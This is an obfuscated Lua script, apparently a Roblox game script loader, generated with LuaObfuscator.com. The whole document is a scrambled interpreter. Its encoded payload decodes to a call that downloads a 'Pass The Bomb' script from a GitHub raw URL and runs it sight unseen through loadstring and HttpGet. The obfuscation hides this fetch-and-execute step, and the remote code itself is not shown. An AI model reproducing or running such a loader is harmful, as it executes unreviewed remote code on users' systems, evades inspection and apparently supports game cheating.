--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v75=0;local v76;while true do if (v75==1) then return v76;end if (v75==0) then v76=v5(v68,v19);v19=nil;v75=1;end end else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=877 -(282 + 595) ;local v70;while true do if (v69==(0 -(1637 -(1523 + 114)))) then v70=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(499 + 56 + 64))) -(v32-(932 -((1221 -364) + 74)))) + (569 -(367 + 201)))) ;return v70-(v70%((1993 -(68 + 997)) -(214 + 713))) ;end end else local v71=2^(v32-1) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1270 -(226 + 1044) ;local v36;local v37;while true do if (v35==(4 -3)) then return (v37 * (373 -(32 + 85))) + v36 ;end if (v35==(0 + (0 -0))) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + 2 ;v35=958 -(892 + 65) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -(3 + 0)) ;return (v41 * (16777396 -(67 + (449 -336)))) + (v40 * (48056 + 17480)) + (v39 * (628 -372)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=953 -((1418 -616) + 150) ;local v45=(v20(v43,2 -1 ,36 -(454 -(145 + 293)) ) * (2^(24 + 8))) + v42 ;local v46=v20(v43,451 -(44 + 386) ,1028 -(915 + 82) );local v47=((v20(v43,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * ((1486 -(998 + 488)) + 0) ;else v46=1 -0 ;v44=0 + 0 ;end elseif (v46==(2838 -(368 + 423))) then return ((v45==(0 -0)) and (v47 * ((19 -(10 + 8))/((0 + 0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + 26)) ) * (v44 + (v45/((6 -4)^(23 + 29)))) ;end local function v25(v48)local v49=0 + 0 + 0 ;local v50;local v51;while true do if (v49==3) then return v6(v51);end if (v49==(774 -(201 + 571))) then v51={};for v77=(403 + 736) -(116 + 1022) , #v50 do v51[v77]=v2(v1(v3(v50,v77,v77)));end v49=12 -(894 -(261 + 624)) ;end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=2;end if (v49==(0 -0)) then v50=nil;if  not v48 then local v93=0;while true do if (v93==(0 -0)) then v48=v23();if (v48==(859 -(814 + 45))) then return "";end break;end end end v49=2 -1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=888 -(117 + 771) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(405 -(108 + 294))) then v59=nil;v60=nil;v52=1493 -(570 + 919) ;end if (v52==(2 -0)) then v57=nil;v58=nil;v52=814 -(569 + 242) ;end if (v52~=(0 -0)) then else v53=0 + 0 ;v54=nil;v52=1;end if (v52==(1028 -(706 + 318))) then while true do if (v53~=2) then else local v96=1251 -(721 + 530) ;while true do if (v96~=1) then else v53=1274 -(945 + 326) ;break;end if (v96~=0) then else v58=nil;v59=nil;v96=2 -1 ;end end end if (v53==3) then v60=nil;while true do local v99=0;while true do if (v99==0) then local v106=0 + 0 ;while true do if (v106~=(701 -(271 + 429))) then else v99=1 + 0 ;break;end if (v106==0) then if (v54==(1501 -(1408 + 92))) then local v115=0;while true do if (v115==0) then v58={v55,v56,nil,v57};v59=v23();v115=1 + 0 ;end if (1~=v115) then else v60={};v54=2;break;end end end if (v54==0) then local v116=0;local v117;while true do if (v116==(1171 -(418 + 753))) then v117=0 + 0 ;while true do if (v117==(0 + 0)) then local v167=0;while true do if ((1 + 0)==v167) then v117=1 + 0 ;break;end if (v167==(529 -(406 + 123))) then v55={};v56={};v167=1;end end end if (v117==(1770 -(1749 + 20))) then v57={};v54=1;break;end end break;end end end v106=1;end end end if (v99==1) then if (v54~=(1 + 2)) then else local v107=0;while true do if (v107==(1322 -(1249 + 73))) then for v121=1,v23() do v56[v121-(1 + 0) ]=v28();end return v58;end end end if (v54==2) then local v108=0;while true do if (v108~=1) then else for v123=1,v23() do local v124=0;local v125;local v126;while true do if (v124~=(1145 -(466 + 679))) then else v125=0 -0 ;v126=nil;v124=2 -1 ;end if ((1901 -(106 + 1794))==v124) then while true do if (v125==(0 + 0)) then v126=v21();if (v20(v126,1,1 + 0 )~=0) then else local v170=0;local v171;local v172;local v173;local v174;while true do if (v170==(2 -1)) then v173=nil;v174=nil;v170=2;end if (0==v170) then v171=0 -0 ;v172=nil;v170=115 -(4 + 110) ;end if ((586 -(57 + 527))==v170) then while true do if (v171==(1428 -(41 + 1386))) then local v181=103 -(17 + 86) ;while true do if (v181~=0) then else local v188=0;while true do if (v188==(0 + 0)) then v174={v22(),v22(),nil,nil};if (v172==0) then local v190=0;local v191;local v192;while true do if (v190~=(167 -(122 + 44))) then else while true do if (v191==(0 -0)) then v192=0 -0 ;while true do if (0~=v192) then else v174[3 + 0 ]=v22();v174[1 + 3 ]=v22();break;end end break;end end break;end if (v190~=0) then else v191=0;v192=nil;v190=1 -0 ;end end elseif (v172==1) then v174[3]=v23();elseif (v172==(67 -(30 + 35))) then v174[3 + 0 ]=v23() -((1259 -(1043 + 214))^16) ;elseif (v172==(11 -8)) then local v199=1212 -(323 + 889) ;local v200;while true do if (v199==(0 -0)) then v200=580 -(361 + 219) ;while true do if ((320 -(53 + 267))==v200) then v174[3]=v23() -(2^(4 + 12)) ;v174[4]=v22();break;end end break;end end end v188=1;end if (v188==(414 -(15 + 398))) then v181=1;break;end end end if (v181==1) then v171=2;break;end end end if (v171~=(982 -(18 + 964))) then else local v182=0;while true do if (v182~=(0 -0)) then else v172=v20(v126,2,2 + 1 );v173=v20(v126,4,4 + 2 );v182=851 -(20 + 830) ;end if (v182==(1 + 0)) then v171=1;break;end end end if (v171~=(129 -(116 + 10))) then else if (v20(v173,1 + 2 ,3)~=(739 -(542 + 196))) then else v174[8 -4 ]=v60[v174[2 + 2 ]];end v55[v123]=v174;break;end if (2==v171) then local v184=0 + 0 ;local v185;while true do if ((0 + 0)==v184) then v185=0;while true do if (0~=v185) then else local v189=0 -0 ;while true do if (v189~=1) then else v185=1;break;end if (v189~=(0 -0)) then else if (v20(v173,1,1552 -(1126 + 425) )==1) then v174[2]=v60[v174[407 -(118 + 287) ]];end if (v20(v173,2,2)==1) then v174[3]=v60[v174[11 -8 ]];end v189=1;end end end if (v185~=(1122 -(118 + 1003))) then else v171=3;break;end end break;end end end end break;end end end break;end end break;end end end v54=8 -5 ;break;end if (v108==(377 -(142 + 235))) then for v127=4 -3 ,v59 do local v128=0 + 0 ;local v129;local v130;local v131;local v132;local v133;while true do if (v128==(978 -(553 + 424))) then v131=nil;v132=nil;v128=3 -1 ;end if (v128==2) then v133=nil;while true do if (v129==0) then local v168=0 + 0 ;while true do if (1==v168) then v129=1;break;end if (v168==0) then v130=0 + 0 ;v131=nil;v168=1;end end end if (1~=v129) then else local v169=0 + 0 ;while true do if (v169~=(0 + 0)) then else v132=nil;v133=nil;v169=1;end if (1==v169) then v129=2 + 0 ;break;end end end if (v129~=(4 -2)) then else while true do if ((0 -0)~=v130) then else local v175=0;local v176;while true do if (v175~=0) then else v176=0 -0 ;while true do if (v176~=(1 + 0)) then else v130=4 -3 ;break;end if (v176~=(753 -(239 + 514))) then else v131=0;v132=nil;v176=1 + 0 ;end end break;end end end if (v130==(1330 -(797 + 532))) then v133=nil;while true do if (v131~=0) then else local v177=0 + 0 ;local v178;local v179;while true do if (v177==1) then while true do if (v178~=(0 + 0)) then else v179=0 -0 ;while true do if (v179==1) then v131=1;break;end if (0~=v179) then else v132=v21();v133=nil;v179=1203 -(373 + 829) ;end end break;end end break;end if (v177~=(731 -(476 + 255))) then else v178=1130 -(369 + 761) ;v179=nil;v177=1;end end end if (v131==(1 + 0)) then if (v132==1) then v133=v21()~=0 ;elseif (v132==(2 -0)) then v133=v24();elseif (v132==3) then v133=v25();end v60[v127]=v133;break;end end break;end end break;end end break;end if (v128==(0 -0)) then v129=0;v130=nil;v128=1;end end end v58[241 -(64 + 174) ]=v21();v108=1 + 0 ;end end end break;end end end break;end if (v53==0) then local v97=0;while true do if (v97==1) then v53=1 -0 ;break;end if (v97==(336 -(144 + 192))) then v54=0;v55=nil;v97=217 -(42 + 174) ;end end end if (v53~=(1 + 0)) then else local v98=0;while true do if (v98==0) then v56=nil;v57=nil;v98=1;end if (v98==(1 + 0)) then v53=2;break;end end end end break;end if ((1 + 0)==v52) then v55=nil;v56=nil;v52=1506 -(363 + 1141) ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (1==v64) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v95=0;while true do if (v95==1) then if (v92<=6) then if (v92<=2) then if (v92<=0) then v89[v91[2]]=v91[3];elseif (v92>1) then local v134=0;local v135;local v136;local v137;local v138;while true do if (0==v134) then v135=v91[2];v136,v137=v82(v89[v135](v13(v89,v135 + 1 ,v91[3])));v134=1;end if (v134==1) then v84=(v137 + v135) -1 ;v138=0;v134=2;end if (v134==2) then for v164=v135,v84 do v138=v138 + 1 ;v89[v164]=v136[v138];end break;end end else do return;end end elseif (v92<=4) then if (v92>3) then local v139=0;local v140;while true do if (v139==0) then v140=v91[2];v89[v140]=v89[v140](v13(v89,v140 + 1 ,v84));break;end end else local v141=v91[2];local v142=v89[v91[3]];v89[v141 + 1 ]=v142;v89[v141]=v142[v91[4]];end elseif (v92==5) then do return;end else v89[v91[2]]=v91[3];end elseif (v92<=9) then if (v92<=7) then local v111=v91[2];local v112,v113=v82(v89[v111](v13(v89,v111 + 1 ,v91[3])));v84=(v113 + v111) -1 ;local v114=0;for v119=v111,v84 do local v120=0;while true do if (v120==0) then v114=v114 + 1 ;v89[v119]=v112[v114];break;end end end elseif (v92>8) then v89[v91[2]]=v63[v91[3]];else v89[v91[2]]();end elseif (v92<=11) then if (v92==10) then local v150=v91[2];local v151=v89[v91[3]];v89[v150 + 1 ]=v151;v89[v150]=v151[v91[4]];else v89[v91[2]]();end elseif (v92==12) then v89[v91[2]]=v63[v91[3]];else local v157=v91[2];v89[v157]=v89[v157](v13(v89,v157 + 1 ,v84));end v83=v83 + 1 ;break;end if (v95==0) then v91=v79[v83];v92=v91[1];v95=1;end end end end;end if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574035A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696E536372697074733335322F4D61696E536372697074733335322F6D61696E2F50612O73253230546865253230426F6D622E74787400083O00120C3O00013O00120C000100023O00200A00010001000300122O000300044O0002000100034O00045O00022O00083O000100012O00013O00017O00",v9(),...);end